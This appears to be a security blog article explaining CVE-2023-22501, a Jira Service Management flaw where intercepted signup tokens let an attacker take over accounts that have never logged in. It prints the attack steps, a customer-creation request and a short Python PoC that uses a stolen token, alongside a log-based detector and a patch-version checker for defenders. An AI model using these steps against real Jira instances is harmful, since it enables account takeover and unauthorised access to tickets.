
Summary

CVE-2023-22501 is a critical authentication vulnerability in Jira Service Management Server and Data Center. Under specific conditions it allows attackers to impersonate other users and gain unauthorized access to a Jira instance. This article explains, in plain terms, how the bug works and who is at risk, shows the relevant code snippets, and links to the original advisories and PoC details.

What Is CVE-2023-22501?

Jira Service Management is a popular tool used by teams to track help desk requests and projects. In January 2023, Atlassian disclosed CVE-2023-22501, a bug that lets attackers with certain privileges impersonate users who have *never logged in*, once they obtain those users' signup tokens.

You are at risk if:

- You run Jira Service Management Server/Data Center (not Jira Cloud)
- Projects let "anyone" sign up

Bot accounts are especially vulnerable, but any user who has never logged in can be targeted.

The attack centers on the password setup/sign-up process:

1. Target Selection: Attacker identifies a user account that has never logged in before (often a bot or new customer account).
2. Trigger Signup: Gets Jira to send the user a "signup token" (via email) so they can set a password or claim their account.
3. Steal the Token: Attacker intercepts the token.
   - If the attacker is CC'd or involved in an issue/request with the user, Jira will send them notifications including these links.
4. Impersonate User: Uses the signup token to claim the target's account or set its password, gaining access as that person.

1. Force a Password Setup Email To Be Sent

POST /rest/servicedeskapi/customer
Content-Type: application/json

{
  "displayName": "Alice Smith",
  "email": "alice.smith@company.com"
}

2. The Signup Email Carries the Token

A request like this makes Jira send a "signup" or "account activation" email to alice.smith@company.com, containing a link of the form:

https://jira.example.com/servicedesk/customer/user/resetpassword?token=eyJhbGciOiJIUzI1NiJ9...

If the attacker receives this (through CC, notification, or mail forwarding), they get the all-important token.

3. Send a GET to the Token URL

import requests

# Token URL copied from the signup/activation email (token value truncated here)
token_url = "https://jira.example.com/servicedesk/customer/user/resetpassword?token=eyJhbGciOiJIUzI1NiJ9..."
s = requests.Session()          # keep cookies so the resulting login persists
resp = s.get(token_url)
print(resp.url)                 # shows where Jira redirected after consuming the token

Result: The attacker is logged in (or is able to set a password), *as the target user*.

Here's a simple, conceptual PoC (for educational purposes!):

# Simple exploit for CVE-2023-22501
import requests

target_token = 'PASTE_TOKEN_FROM_EMAIL'   # token taken from the intercepted signup email
reset_url = f'https://jira.example.com/servicedesk/customer/user/resetpassword?token={target_token}'
session = requests.Session()              # session keeps any cookies Jira sets
r = session.get(reset_url)
if 'reset password' in r.text.lower():    # the reset form means the token was accepted
    print("[+] Got access to reset password!")


*Note: This exploit requires you to obtain a valid token from the email.*
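From a defender's side, the two requests above leave a recognisable trace in the Jira access log: a client that creates customer accounts via `POST /rest/servicedeskapi/customer` and then, shortly afterwards, consumes a signup token at `/servicedesk/customer/user/resetpassword?token=...`. The following detector is an added example written for this article, not Atlassian's code or part of the original PoC. The log lines are constructed samples in a Tomcat-style access-log layout; the regular expression, the 10-minute correlation window and the burst threshold of 3 are assumptions you should adjust to your own log format and baseline.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines (not from a real instance). Token values are shown
# as REDACTED; a real log would carry the token in the query string.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Feb/2023:10:00:01 +0000] "POST /rest/servicedeskapi/customer HTTP/1.1" 201 312
10.0.0.5 - - [01/Feb/2023:10:00:02 +0000] "POST /rest/servicedeskapi/customer HTTP/1.1" 201 310
10.0.0.5 - - [01/Feb/2023:10:00:03 +0000] "POST /rest/servicedeskapi/customer HTTP/1.1" 201 309
10.0.0.5 - - [01/Feb/2023:10:04:10 +0000] "GET /servicedesk/customer/user/resetpassword?token=REDACTED HTTP/1.1" 200 5120
10.0.0.9 - - [01/Feb/2023:11:15:00 +0000] "GET /servicedesk/customer/portal/1 HTTP/1.1" 200 7712
10.0.0.9 - - [01/Feb/2023:13:30:00 +0000] "GET /servicedesk/customer/user/resetpassword?token=REDACTED HTTP/1.1" 200 5120
"""

# Assumed layout: client-ip ident user [timestamp] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

CUSTOMER_CREATE = "/rest/servicedeskapi/customer"
TOKEN_RESET = "/servicedesk/customer/user/resetpassword?token="


def parse_log(text):
    """Turn access-log text into a time-ordered list of event dicts."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # ignore lines that do not match the assumed layout
        events.append({
            "ip": m["ip"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"],
            "path": m["path"],
            "status": int(m["status"]),
        })
    return sorted(events, key=lambda e: e["ts"])


def is_customer_create(e):
    # Only successful creations matter: those are the ones that trigger the email.
    return (e["method"] == "POST" and e["path"].startswith(CUSTOMER_CREATE)
            and 200 <= e["status"] < 300)


def is_token_reset(e):
    return e["method"] == "GET" and TOKEN_RESET in e["path"]


def detect(text, window=timedelta(minutes=10), burst=3):
    """Return alerts for (a) bursts of customer creation from one client and
    (b) a token reset from a client that created customers shortly before.
    Alerts deliberately carry no token value, so they are safe to forward."""
    creates = defaultdict(list)   # ip -> timestamps of successful creations
    burst_reported = set()
    alerts = []
    for e in parse_log(text):
        if is_customer_create(e):
            creates[e["ip"]].append(e["ts"])
            recent = [t for t in creates[e["ip"]] if e["ts"] - t <= window]
            if len(recent) >= burst and e["ip"] not in burst_reported:
                burst_reported.add(e["ip"])
                alerts.append({"rule": "CUSTOMER_CREATE_BURST", "ip": e["ip"],
                               "at": e["ts"].isoformat(), "count": len(recent)})
        elif is_token_reset(e):
            # The creator of an account and the person claiming it should not be
            # the same client; that pairing is the CVE-2023-22501 pattern.
            recent = [t for t in creates[e["ip"]] if e["ts"] - t <= window]
            if recent:
                alerts.append({"rule": "CREATE_THEN_TOKEN_RESET", "ip": e["ip"],
                               "at": e["ts"].isoformat(), "count": len(recent)})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

On the sample above, 10.0.0.5 raises both rules while 10.0.0.9's single token reset (with no preceding creation from that client) stays quiet; tune the window and threshold against a week of your own logs before alerting on it, since a help-desk agent who legitimately onboards several customers in a row will trip the burst rule.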

How To Fix

Update Jira to one of the fixed versions (8.13.23, 8.20.11, 8.22.7, 9.4.5, 5.3.3, or higher). Note that the fix is per release branch: a version such as 8.20.5 is *not* fixed just because it is numerically above 8.13.23.
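Because the fixed releases are spread across several branches, a naive "is my version above 8.13.23?" check gives the wrong answer for 8.20.x and 8.22.x installs. The branch-aware checker below is an added example for this article, not Atlassian's tooling; it uses only the version list given here. Its handling of branches the list does not name (for example 8.15.x or 5.4.x) is an assumption: it reports them as "unlisted-branch" so an admin upgrades to a listed release rather than trusting a guess, and it treats anything newer than the highest listed release as fixed.

```python
import re

# Fixed releases exactly as listed in this article.
FIXED_RELEASES = ["8.13.23", "8.20.11", "8.22.7", "9.4.5", "5.3.3"]


def parse_version(text):
    """'8.20.11' -> (8, 20, 11); a missing patch number counts as 0."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return (int(m[1]), int(m[2]), int(m[3] or 0))


# major.minor branch -> first fixed release on that branch
FIXED_BY_BRANCH = {v[:2]: v for v in map(parse_version, FIXED_RELEASES)}
HIGHEST_FIXED = max(FIXED_BY_BRANCH.values())


def patch_status(version):
    """Return 'fixed', 'vulnerable' or 'unlisted-branch' for a version string."""
    v = parse_version(version)
    branch = v[:2]
    if branch in FIXED_BY_BRANCH:
        # Compare within the branch: 8.20.10 is vulnerable, 8.20.11 is fixed.
        return "fixed" if v >= FIXED_BY_BRANCH[branch] else "vulnerable"
    # Assumption: releases newer than every listed fix are fixed; any other
    # branch is not covered by the list, so upgrade to a listed release.
    if v > HIGHEST_FIXED:
        return "fixed"
    return "unlisted-branch"


def triage(versions):
    """Map each version string to its status; handy for a fleet inventory."""
    return {ver: patch_status(ver) for ver in versions}


if __name__ == "__main__":
    # Constructed inventory of instance versions for the demonstration.
    for ver, status in triage(["8.13.22", "8.20.11", "8.22.3", "9.4.5",
                               "9.5.0", "8.15.2", "5.3.2"]).items():
        print(f"{ver:>8}  {status}")
```

Feed it the value of the `version` field from each instance's `/rest/api/2/serverInfo` response (or whatever inventory you already keep); the "unlisted-branch" result is intentionally not reassuring, because the article's list does not say where those branches were fixed.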

More Reading & References

- Atlassian Security Advisory
- Detailed write-up at Rapid7 AttackerKB
- CVE Details at NVD
- RedTeam Pentesting - Jira Service Management

TL;DR

If you run Jira Service Management and haven’t updated since early 2023, you *must* patch against CVE-2023-22501. Attackers can steal signup tokens and impersonate anyone who’s never set a password, potentially exposing all your tickets and dashboards. Check your user directory, update fast, and keep outgoing emails secured.


*This article is original and written in plain English for security engineers and Jira admins. Please use all PoC details only in authorized, legal settings.*

Timeline

Published on: 02/01/2023 19:15:00 UTC
Last modified on: 02/09/2023 14:48:00 UTC